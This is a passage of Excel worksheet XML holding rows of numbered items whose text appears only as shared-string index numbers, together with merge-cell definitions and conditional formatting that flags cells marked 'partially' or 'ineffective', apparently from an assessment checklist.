    <row r="63" spans="1:10" ht="133" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A63" s="49">
        <v>18</v>
      </c>
      <c r="B63" s="14" t="s">
        <v>93</v>
      </c>
      <c r="C63" s="14" t="s">
        <v>94</v>
      </c>
      <c r="D63" s="47" t="s">
        <v>158</v>
      </c>
      <c r="E63" s="41" t="s">
        <v>179</v>
      </c>
      <c r="F63" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G63" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H63" s="18"/>
      <c r="I63" s="14"/>
      <c r="J63" s="21"/>
    </row>
    <row r="64" spans="1:10" ht="133" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A64" s="50"/>
      <c r="B64" s="15" t="s">
        <v>95</v>
      </c>
      <c r="C64" s="15" t="s">
        <v>96</v>
      </c>
      <c r="D64" s="51"/>
      <c r="E64" s="43"/>
      <c r="F64" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G64" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H64" s="20"/>
      <c r="I64" s="15"/>
      <c r="J64" s="22"/>
    </row>
    <row r="65" spans="1:10" ht="158.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A65" s="49">
        <v>19</v>
      </c>
      <c r="B65" s="16" t="s">
        <v>93</v>
      </c>
      <c r="C65" s="47" t="s">
        <v>97</v>
      </c>
      <c r="D65" s="47" t="s">
        <v>98</v>
      </c>
      <c r="E65" s="45" t="s">
        <v>195</v>
      </c>
      <c r="F65" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G65" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H65" s="18"/>
      <c r="I65" s="14"/>
      <c r="J65" s="21"/>
    </row>
    <row r="66" spans="1:10" ht="158.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A66" s="50"/>
      <c r="B66" s="15" t="s">
        <v>95</v>
      </c>
      <c r="C66" s="51"/>
      <c r="D66" s="51"/>
      <c r="E66" s="48"/>
      <c r="F66" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G66" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H66" s="20"/>
      <c r="I66" s="15"/>
      <c r="J66" s="22"/>
    </row>
    <row r="67" spans="1:10" ht="85" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A67" s="49">
        <v>20</v>
      </c>
      <c r="B67" s="47" t="s">
        <v>95</v>
      </c>
      <c r="C67" s="47" t="s">
        <v>99</v>
      </c>
      <c r="D67" s="47" t="s">
        <v>100</v>
      </c>
      <c r="E67" s="41" t="s">
        <v>180</v>
      </c>
      <c r="F67" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G67" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H67" s="18"/>
      <c r="I67" s="14"/>
      <c r="J67" s="39" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="68" spans="1:10" ht="85" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A68" s="50"/>
      <c r="B68" s="51"/>
      <c r="C68" s="51"/>
      <c r="D68" s="51"/>
      <c r="E68" s="43"/>
      <c r="F68" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G68" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H68" s="20"/>
      <c r="I68" s="15"/>
      <c r="J68" s="40"/>
    </row>
    <row r="69" spans="1:10" ht="90" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A69" s="49">
        <v>21</v>
      </c>
      <c r="B69" s="47" t="s">
        <v>95</v>
      </c>
      <c r="C69" s="47" t="s">
        <v>102</v>
      </c>
      <c r="D69" s="47" t="s">
        <v>103</v>
      </c>
      <c r="E69" s="41" t="s">
        <v>181</v>
      </c>
      <c r="F69" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G69" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H69" s="18"/>
      <c r="I69" s="14"/>
      <c r="J69" s="39" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="70" spans="1:10" ht="90" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A70" s="50"/>
      <c r="B70" s="51"/>
      <c r="C70" s="51"/>
      <c r="D70" s="51"/>
      <c r="E70" s="43"/>
      <c r="F70" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G70" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H70" s="20"/>
      <c r="I70" s="15"/>
      <c r="J70" s="40"/>
    </row>
    <row r="71" spans="1:10" ht="159.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A71" s="49">
        <v>22</v>
      </c>
      <c r="B71" s="47" t="s">
        <v>105</v>
      </c>
      <c r="C71" s="14" t="s">
        <v>106</v>
      </c>
      <c r="D71" s="47" t="s">
        <v>107</v>
      </c>
      <c r="E71" s="41" t="s">
        <v>182</v>
      </c>
      <c r="F71" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G71" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H71" s="18"/>
      <c r="I71" s="14"/>
      <c r="J71" s="39" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="72" spans="1:10" ht="159.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A72" s="54"/>
      <c r="B72" s="48"/>
      <c r="C72" s="5" t="s">
        <v>108</v>
      </c>
      <c r="D72" s="48"/>
      <c r="E72" s="42"/>
      <c r="F72" s="33" t="s">
        <v>59</v>
      </c>
      <c r="G72" s="26" t="s">
        <v>60</v>
      </c>
      <c r="H72" s="23"/>
      <c r="I72" s="5"/>
      <c r="J72" s="44"/>
    </row>
    <row r="73" spans="1:10" ht="159.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A73" s="50"/>
      <c r="B73" s="51"/>
      <c r="C73" s="15" t="s">
        <v>109</v>
      </c>
      <c r="D73" s="51"/>
      <c r="E73" s="43"/>
      <c r="F73" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G73" s="27" t="s">
        <v>60</v>
      </c>
      <c r="H73" s="20"/>
      <c r="I73" s="15"/>
      <c r="J73" s="40"/>
    </row>
    <row r="74" spans="1:10" ht="128" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A74" s="49">
        <v>23</v>
      </c>
      <c r="B74" s="47" t="s">
        <v>105</v>
      </c>
      <c r="C74" s="47" t="s">
        <v>110</v>
      </c>
      <c r="D74" s="47" t="s">
        <v>111</v>
      </c>
      <c r="E74" s="41" t="s">
        <v>183</v>
      </c>
      <c r="F74" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G74" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H74" s="18"/>
      <c r="I74" s="14"/>
      <c r="J74" s="21"/>
    </row>
    <row r="75" spans="1:10" ht="128" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A75" s="50"/>
      <c r="B75" s="51"/>
      <c r="C75" s="51"/>
      <c r="D75" s="51"/>
      <c r="E75" s="43"/>
      <c r="F75" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G75" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H75" s="20"/>
      <c r="I75" s="15"/>
      <c r="J75" s="36" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="76" spans="1:10" ht="76.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A76" s="49">
        <v>24</v>
      </c>
      <c r="B76" s="47" t="s">
        <v>105</v>
      </c>
      <c r="C76" s="47" t="s">
        <v>112</v>
      </c>
      <c r="D76" s="47" t="s">
        <v>150</v>
      </c>
      <c r="E76" s="41" t="s">
        <v>184</v>
      </c>
      <c r="F76" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G76" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H76" s="18"/>
      <c r="I76" s="14"/>
      <c r="J76" s="21"/>
    </row>
    <row r="77" spans="1:10" ht="76.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A77" s="50"/>
      <c r="B77" s="51"/>
      <c r="C77" s="51"/>
      <c r="D77" s="51"/>
      <c r="E77" s="43"/>
      <c r="F77" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G77" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H77" s="20"/>
      <c r="I77" s="15"/>
      <c r="J77" s="25"/>
    </row>
    <row r="78" spans="1:10" ht="72" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A78" s="49">
        <v>25</v>
      </c>
      <c r="B78" s="47" t="s">
        <v>74</v>
      </c>
      <c r="C78" s="14" t="s">
        <v>113</v>
      </c>
      <c r="D78" s="47" t="s">
        <v>114</v>
      </c>
      <c r="E78" s="41" t="s">
        <v>186</v>
      </c>
      <c r="F78" s="47" t="s">
        <v>59</v>
      </c>
      <c r="G78" s="47" t="s">
        <v>60</v>
      </c>
      <c r="H78" s="18"/>
      <c r="I78" s="14"/>
      <c r="J78" s="21"/>
    </row>
    <row r="79" spans="1:10" ht="72" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A79" s="54"/>
      <c r="B79" s="48"/>
      <c r="C79" s="5" t="s">
        <v>115</v>
      </c>
      <c r="D79" s="48"/>
      <c r="E79" s="42"/>
      <c r="F79" s="48"/>
      <c r="G79" s="48"/>
      <c r="H79" s="23"/>
      <c r="I79" s="5"/>
      <c r="J79" s="24"/>
    </row>
    <row r="80" spans="1:10" ht="72" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A80" s="54"/>
      <c r="B80" s="48"/>
      <c r="C80" s="5" t="s">
        <v>116</v>
      </c>
      <c r="D80" s="48"/>
      <c r="E80" s="42"/>
      <c r="F80" s="45" t="s">
        <v>59</v>
      </c>
      <c r="G80" s="45" t="s">
        <v>60</v>
      </c>
      <c r="H80" s="23"/>
      <c r="I80" s="5"/>
      <c r="J80" s="24"/>
    </row>
    <row r="81" spans="1:10" ht="72" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A81" s="50"/>
      <c r="B81" s="51"/>
      <c r="C81" s="15" t="s">
        <v>82</v>
      </c>
      <c r="D81" s="51"/>
      <c r="E81" s="43"/>
      <c r="F81" s="46"/>
      <c r="G81" s="46"/>
      <c r="H81" s="20"/>
      <c r="I81" s="15"/>
      <c r="J81" s="25"/>
    </row>
    <row r="82" spans="1:10" ht="63.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A82" s="49">
        <v>26</v>
      </c>
      <c r="B82" s="47" t="s">
        <v>74</v>
      </c>
      <c r="C82" s="14" t="s">
        <v>117</v>
      </c>
      <c r="D82" s="47" t="s">
        <v>118</v>
      </c>
      <c r="E82" s="41" t="s">
        <v>185</v>
      </c>
      <c r="F82" s="47" t="s">
        <v>59</v>
      </c>
      <c r="G82" s="47" t="s">
        <v>60</v>
      </c>
      <c r="H82" s="18"/>
      <c r="I82" s="14"/>
      <c r="J82" s="21"/>
    </row>
    <row r="83" spans="1:10" ht="63.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A83" s="54"/>
      <c r="B83" s="48"/>
      <c r="C83" s="5" t="s">
        <v>115</v>
      </c>
      <c r="D83" s="48"/>
      <c r="E83" s="42"/>
      <c r="F83" s="48"/>
      <c r="G83" s="48"/>
      <c r="H83" s="23"/>
      <c r="I83" s="5"/>
      <c r="J83" s="24"/>
    </row>
    <row r="84" spans="1:10" ht="63.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A84" s="50"/>
      <c r="B84" s="51"/>
      <c r="C84" s="15" t="s">
        <v>119</v>
      </c>
      <c r="D84" s="51"/>
      <c r="E84" s="43"/>
      <c r="F84" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G84" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H84" s="20"/>
      <c r="I84" s="15"/>
      <c r="J84" s="22"/>
    </row>
    <row r="85" spans="1:10" ht="50.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A85" s="49">
        <v>27</v>
      </c>
      <c r="B85" s="47" t="s">
        <v>87</v>
      </c>
      <c r="C85" s="47" t="s">
        <v>120</v>
      </c>
      <c r="D85" s="47" t="s">
        <v>151</v>
      </c>
      <c r="E85" s="41" t="s">
        <v>187</v>
      </c>
      <c r="F85" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G85" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H85" s="18"/>
      <c r="I85" s="14"/>
      <c r="J85" s="39" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="86" spans="1:10" ht="50.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A86" s="50"/>
      <c r="B86" s="51"/>
      <c r="C86" s="51"/>
      <c r="D86" s="51"/>
      <c r="E86" s="43"/>
      <c r="F86" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G86" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H86" s="20"/>
      <c r="I86" s="15"/>
      <c r="J86" s="40"/>
    </row>
    <row r="87" spans="1:10" ht="82.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A87" s="49">
        <v>28</v>
      </c>
      <c r="B87" s="47" t="s">
        <v>87</v>
      </c>
      <c r="C87" s="47" t="s">
        <v>121</v>
      </c>
      <c r="D87" s="47" t="s">
        <v>156</v>
      </c>
      <c r="E87" s="41" t="s">
        <v>188</v>
      </c>
      <c r="F87" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G87" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H87" s="18"/>
      <c r="I87" s="14"/>
      <c r="J87" s="39" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="88" spans="1:10" ht="82.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A88" s="50"/>
      <c r="B88" s="51"/>
      <c r="C88" s="51"/>
      <c r="D88" s="51"/>
      <c r="E88" s="43"/>
      <c r="F88" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G88" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H88" s="20"/>
      <c r="I88" s="15"/>
      <c r="J88" s="40"/>
    </row>
    <row r="89" spans="1:10" ht="198.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A89" s="49">
        <v>29</v>
      </c>
      <c r="B89" s="47" t="s">
        <v>87</v>
      </c>
      <c r="C89" s="47" t="s">
        <v>122</v>
      </c>
      <c r="D89" s="47" t="s">
        <v>157</v>
      </c>
      <c r="E89" s="41" t="s">
        <v>198</v>
      </c>
      <c r="F89" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G89" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H89" s="18"/>
      <c r="I89" s="14"/>
      <c r="J89" s="21"/>
    </row>
    <row r="90" spans="1:10" ht="198.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A90" s="50"/>
      <c r="B90" s="51"/>
      <c r="C90" s="51"/>
      <c r="D90" s="51"/>
      <c r="E90" s="43"/>
      <c r="F90" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G90" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H90" s="20"/>
      <c r="I90" s="15"/>
      <c r="J90" s="22"/>
    </row>
    <row r="91" spans="1:10" ht="61.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A91" s="49">
        <v>30</v>
      </c>
      <c r="B91" s="47" t="s">
        <v>123</v>
      </c>
      <c r="C91" s="14" t="s">
        <v>124</v>
      </c>
      <c r="D91" s="47" t="s">
        <v>125</v>
      </c>
      <c r="E91" s="41" t="s">
        <v>189</v>
      </c>
      <c r="F91" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G91" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H91" s="18"/>
      <c r="I91" s="14"/>
      <c r="J91" s="21"/>
    </row>
    <row r="92" spans="1:10" ht="61.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A92" s="50"/>
      <c r="B92" s="51"/>
      <c r="C92" s="15" t="s">
        <v>126</v>
      </c>
      <c r="D92" s="51"/>
      <c r="E92" s="43"/>
      <c r="F92" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G92" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H92" s="20"/>
      <c r="I92" s="15"/>
      <c r="J92" s="22"/>
    </row>
    <row r="93" spans="1:10" ht="83.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A93" s="49">
        <v>31</v>
      </c>
      <c r="B93" s="47" t="s">
        <v>127</v>
      </c>
      <c r="C93" s="47" t="s">
        <v>128</v>
      </c>
      <c r="D93" s="47" t="s">
        <v>129</v>
      </c>
      <c r="E93" s="41" t="s">
        <v>190</v>
      </c>
      <c r="F93" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G93" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H93" s="18"/>
      <c r="I93" s="14"/>
      <c r="J93" s="39" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="94" spans="1:10" ht="83.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A94" s="50"/>
      <c r="B94" s="51"/>
      <c r="C94" s="51"/>
      <c r="D94" s="51"/>
      <c r="E94" s="43"/>
      <c r="F94" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G94" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H94" s="20"/>
      <c r="I94" s="15"/>
      <c r="J94" s="40"/>
    </row>
    <row r="95" spans="1:10" ht="162.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A95" s="49">
        <v>32</v>
      </c>
      <c r="B95" s="47" t="s">
        <v>127</v>
      </c>
      <c r="C95" s="47" t="s">
        <v>130</v>
      </c>
      <c r="D95" s="47" t="s">
        <v>131</v>
      </c>
      <c r="E95" s="52" t="s">
        <v>191</v>
      </c>
      <c r="F95" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G95" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H95" s="18"/>
      <c r="I95" s="14"/>
      <c r="J95" s="39" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="96" spans="1:10" ht="162.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A96" s="50"/>
      <c r="B96" s="51"/>
      <c r="C96" s="51"/>
      <c r="D96" s="51"/>
      <c r="E96" s="53"/>
      <c r="F96" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G96" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H96" s="20"/>
      <c r="I96" s="15"/>
      <c r="J96" s="40"/>
    </row>
    <row r="97" spans="1:10" ht="61.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A97" s="49">
        <v>33</v>
      </c>
      <c r="B97" s="47" t="s">
        <v>132</v>
      </c>
      <c r="C97" s="14" t="s">
        <v>133</v>
      </c>
      <c r="D97" s="47" t="s">
        <v>134</v>
      </c>
      <c r="E97" s="41" t="s">
        <v>192</v>
      </c>
      <c r="F97" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G97" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H97" s="18"/>
      <c r="I97" s="14"/>
      <c r="J97" s="21"/>
    </row>
    <row r="98" spans="1:10" ht="61.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A98" s="50"/>
      <c r="B98" s="51"/>
      <c r="C98" s="15" t="s">
        <v>135</v>
      </c>
      <c r="D98" s="51"/>
      <c r="E98" s="43"/>
      <c r="F98" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G98" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H98" s="20"/>
      <c r="I98" s="15"/>
      <c r="J98" s="22"/>
    </row>
    <row r="99" spans="1:10" ht="41" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A99" s="49">
        <v>34</v>
      </c>
      <c r="B99" s="47" t="s">
        <v>136</v>
      </c>
      <c r="C99" s="47" t="s">
        <v>137</v>
      </c>
      <c r="D99" s="47" t="s">
        <v>138</v>
      </c>
      <c r="E99" s="41" t="s">
        <v>193</v>
      </c>
      <c r="F99" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G99" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H99" s="18"/>
      <c r="I99" s="14"/>
      <c r="J99" s="21"/>
    </row>
    <row r="100" spans="1:10" ht="41" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A100" s="50"/>
      <c r="B100" s="51"/>
      <c r="C100" s="51"/>
      <c r="D100" s="51"/>
      <c r="E100" s="43"/>
      <c r="F100" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G100" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H100" s="20"/>
      <c r="I100" s="15"/>
      <c r="J100" s="22"/>
    </row>
    <row r="101" spans="1:10" ht="40.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A101" s="49">
        <v>35</v>
      </c>
      <c r="B101" s="47" t="s">
        <v>136</v>
      </c>
      <c r="C101" s="47" t="s">
        <v>137</v>
      </c>
      <c r="D101" s="47" t="s">
        <v>139</v>
      </c>
      <c r="E101" s="41" t="s">
        <v>194</v>
      </c>
      <c r="F101" s="14" t="s">
        <v>59</v>
      </c>
      <c r="G101" s="14" t="s">
        <v>60</v>
      </c>
      <c r="H101" s="18"/>
      <c r="I101" s="14"/>
      <c r="J101" s="21"/>
    </row>
    <row r="102" spans="1:10" ht="40.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A102" s="50"/>
      <c r="B102" s="51"/>
      <c r="C102" s="51"/>
      <c r="D102" s="51"/>
      <c r="E102" s="43"/>
      <c r="F102" s="19" t="s">
        <v>59</v>
      </c>
      <c r="G102" s="19" t="s">
        <v>60</v>
      </c>
      <c r="H102" s="20"/>
      <c r="I102" s="15"/>
      <c r="J102" s="22"/>
    </row>
    <row r="103" spans="1:10" ht="21" x14ac:dyDescent="0.35">
      <c r="B103" s="69" t="s">
        <v>140</v>
      </c>
      <c r="C103" s="69"/>
      <c r="D103" s="69"/>
      <c r="E103" s="69"/>
      <c r="F103" s="69"/>
      <c r="G103" s="69"/>
      <c r="H103" s="69"/>
      <c r="I103" s="69"/>
      <c r="J103" s="69"/>
    </row>
    <row r="104" spans="1:10" ht="118.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="B104" s="2" t="s">
        <v>141</v>
      </c>
      <c r="C104" s="67" t="s">
        <v>153</v>
      </c>
      <c r="D104" s="68"/>
      <c r="E104" s="68"/>
      <c r="F104" s="68"/>
      <c r="G104" s="2"/>
    </row>
    <row r="105" spans="1:10" x14ac:dyDescent="0.35">
      <c r="B105" t="s">
        <v>142</v>
      </c>
      <c r="C105" t="s">
        <v>143</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A27:J105" xr:uid="{00000000-0001-0000-0000-000000000000}"/>
  <mergeCells count="183">
    <mergeCell ref="J32:J34"/>
    <mergeCell ref="E35:E36"/>
    <mergeCell ref="J35:J36"/>
    <mergeCell ref="J39:J40"/>
    <mergeCell ref="C32:C34"/>
    <mergeCell ref="E61:E62"/>
    <mergeCell ref="C65:C66"/>
    <mergeCell ref="D65:D66"/>
    <mergeCell ref="E65:E66"/>
    <mergeCell ref="J37:J38"/>
    <mergeCell ref="B39:B40"/>
    <mergeCell ref="D39:D40"/>
    <mergeCell ref="E39:E40"/>
    <mergeCell ref="B35:B36"/>
    <mergeCell ref="D35:D36"/>
    <mergeCell ref="E57:E58"/>
    <mergeCell ref="J85:J86"/>
    <mergeCell ref="J69:J70"/>
    <mergeCell ref="J67:J68"/>
    <mergeCell ref="E69:E70"/>
    <mergeCell ref="J45:J46"/>
    <mergeCell ref="C67:C68"/>
    <mergeCell ref="D67:D68"/>
    <mergeCell ref="D71:D73"/>
    <mergeCell ref="C104:F104"/>
    <mergeCell ref="B103:J103"/>
    <mergeCell ref="B41:B42"/>
    <mergeCell ref="C41:C42"/>
    <mergeCell ref="D41:D42"/>
    <mergeCell ref="E41:E42"/>
    <mergeCell ref="J41:J42"/>
    <mergeCell ref="E43:E44"/>
    <mergeCell ref="B43:B44"/>
    <mergeCell ref="E45:E46"/>
    <mergeCell ref="C43:C44"/>
    <mergeCell ref="D43:D44"/>
    <mergeCell ref="E47:E48"/>
    <mergeCell ref="B59:B60"/>
    <mergeCell ref="C59:C60"/>
    <mergeCell ref="D59:D60"/>
    <mergeCell ref="E59:E60"/>
    <mergeCell ref="E49:E50"/>
    <mergeCell ref="E51:E52"/>
    <mergeCell ref="E53:E54"/>
    <mergeCell ref="B67:B68"/>
    <mergeCell ref="B71:B73"/>
    <mergeCell ref="J87:J88"/>
    <mergeCell ref="E74:E75"/>
    <mergeCell ref="A45:A46"/>
    <mergeCell ref="A47:A48"/>
    <mergeCell ref="A59:A60"/>
    <mergeCell ref="A57:A58"/>
    <mergeCell ref="B61:B62"/>
    <mergeCell ref="C61:C62"/>
    <mergeCell ref="D78:D81"/>
    <mergeCell ref="C69:C70"/>
    <mergeCell ref="A63:A64"/>
    <mergeCell ref="A67:A68"/>
    <mergeCell ref="A71:A73"/>
    <mergeCell ref="A78:A81"/>
    <mergeCell ref="A69:A70"/>
    <mergeCell ref="A76:A77"/>
    <mergeCell ref="A49:A50"/>
    <mergeCell ref="A51:A52"/>
    <mergeCell ref="B45:B46"/>
    <mergeCell ref="C45:C46"/>
    <mergeCell ref="D45:D46"/>
    <mergeCell ref="B69:B70"/>
    <mergeCell ref="D57:D58"/>
    <mergeCell ref="D85:D86"/>
    <mergeCell ref="B93:B94"/>
    <mergeCell ref="D55:D56"/>
    <mergeCell ref="D93:D94"/>
    <mergeCell ref="D87:D88"/>
    <mergeCell ref="C87:C88"/>
    <mergeCell ref="B89:B90"/>
    <mergeCell ref="B85:B86"/>
    <mergeCell ref="C85:C86"/>
    <mergeCell ref="C74:C75"/>
    <mergeCell ref="B74:B75"/>
    <mergeCell ref="E55:E56"/>
    <mergeCell ref="D74:D75"/>
    <mergeCell ref="D61:D62"/>
    <mergeCell ref="D63:D64"/>
    <mergeCell ref="E63:E64"/>
    <mergeCell ref="E67:E68"/>
    <mergeCell ref="C99:C100"/>
    <mergeCell ref="D69:D70"/>
    <mergeCell ref="D47:D48"/>
    <mergeCell ref="D49:D50"/>
    <mergeCell ref="D51:D52"/>
    <mergeCell ref="D53:D54"/>
    <mergeCell ref="G26:I26"/>
    <mergeCell ref="A35:A36"/>
    <mergeCell ref="A37:A38"/>
    <mergeCell ref="A39:A40"/>
    <mergeCell ref="B30:B31"/>
    <mergeCell ref="C30:C31"/>
    <mergeCell ref="D30:D31"/>
    <mergeCell ref="E30:E31"/>
    <mergeCell ref="B28:B29"/>
    <mergeCell ref="B32:B34"/>
    <mergeCell ref="D32:D34"/>
    <mergeCell ref="E32:E34"/>
    <mergeCell ref="E28:E29"/>
    <mergeCell ref="A26:C26"/>
    <mergeCell ref="A28:A29"/>
    <mergeCell ref="A30:A31"/>
    <mergeCell ref="A32:A34"/>
    <mergeCell ref="B37:B38"/>
    <mergeCell ref="D37:D38"/>
    <mergeCell ref="E37:E38"/>
    <mergeCell ref="C28:C29"/>
    <mergeCell ref="D28:D29"/>
    <mergeCell ref="B91:B92"/>
    <mergeCell ref="E91:E92"/>
    <mergeCell ref="A89:A90"/>
    <mergeCell ref="A91:A92"/>
    <mergeCell ref="C93:C94"/>
    <mergeCell ref="A93:A94"/>
    <mergeCell ref="B87:B88"/>
    <mergeCell ref="D91:D92"/>
    <mergeCell ref="B1:C3"/>
    <mergeCell ref="A41:A42"/>
    <mergeCell ref="A43:A44"/>
    <mergeCell ref="C13:D13"/>
    <mergeCell ref="C14:D14"/>
    <mergeCell ref="C21:D23"/>
    <mergeCell ref="A85:A86"/>
    <mergeCell ref="A53:A54"/>
    <mergeCell ref="A55:A56"/>
    <mergeCell ref="A74:A75"/>
    <mergeCell ref="A61:A62"/>
    <mergeCell ref="A65:A66"/>
    <mergeCell ref="C9:E9"/>
    <mergeCell ref="A25:J25"/>
    <mergeCell ref="J30:J31"/>
    <mergeCell ref="J28:J29"/>
    <mergeCell ref="A82:A84"/>
    <mergeCell ref="B82:B84"/>
    <mergeCell ref="D82:D84"/>
    <mergeCell ref="B76:B77"/>
    <mergeCell ref="C76:C77"/>
    <mergeCell ref="D76:D77"/>
    <mergeCell ref="E76:E77"/>
    <mergeCell ref="B78:B81"/>
    <mergeCell ref="C89:C90"/>
    <mergeCell ref="D89:D90"/>
    <mergeCell ref="A87:A88"/>
    <mergeCell ref="A101:A102"/>
    <mergeCell ref="B101:B102"/>
    <mergeCell ref="C101:C102"/>
    <mergeCell ref="D101:D102"/>
    <mergeCell ref="E101:E102"/>
    <mergeCell ref="A95:A96"/>
    <mergeCell ref="B95:B96"/>
    <mergeCell ref="D95:D96"/>
    <mergeCell ref="E95:E96"/>
    <mergeCell ref="A97:A98"/>
    <mergeCell ref="B97:B98"/>
    <mergeCell ref="C95:C96"/>
    <mergeCell ref="D97:D98"/>
    <mergeCell ref="E97:E98"/>
    <mergeCell ref="B99:B100"/>
    <mergeCell ref="E99:E100"/>
    <mergeCell ref="A99:A100"/>
    <mergeCell ref="D99:D100"/>
    <mergeCell ref="J93:J94"/>
    <mergeCell ref="J95:J96"/>
    <mergeCell ref="E78:E81"/>
    <mergeCell ref="J71:J73"/>
    <mergeCell ref="G80:G81"/>
    <mergeCell ref="G78:G79"/>
    <mergeCell ref="F82:F83"/>
    <mergeCell ref="G82:G83"/>
    <mergeCell ref="F78:F79"/>
    <mergeCell ref="F80:F81"/>
    <mergeCell ref="E71:E73"/>
    <mergeCell ref="E87:E88"/>
    <mergeCell ref="E89:E90"/>
    <mergeCell ref="E85:E86"/>
    <mergeCell ref="E82:E84"/>
    <mergeCell ref="E93:E94"/>
  </mergeCells>
  <conditionalFormatting sqref="I28:I102">
    <cfRule type="containsText" dxfId="2" priority="1" operator="containsText" text="partially">
      <formula>NOT(ISERROR(SEARCH("partially",I28)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="ineffective">
      <formula>NOT(ISERROR(SEARCH("ineffective",I28)))</formula>
    </cfRule>
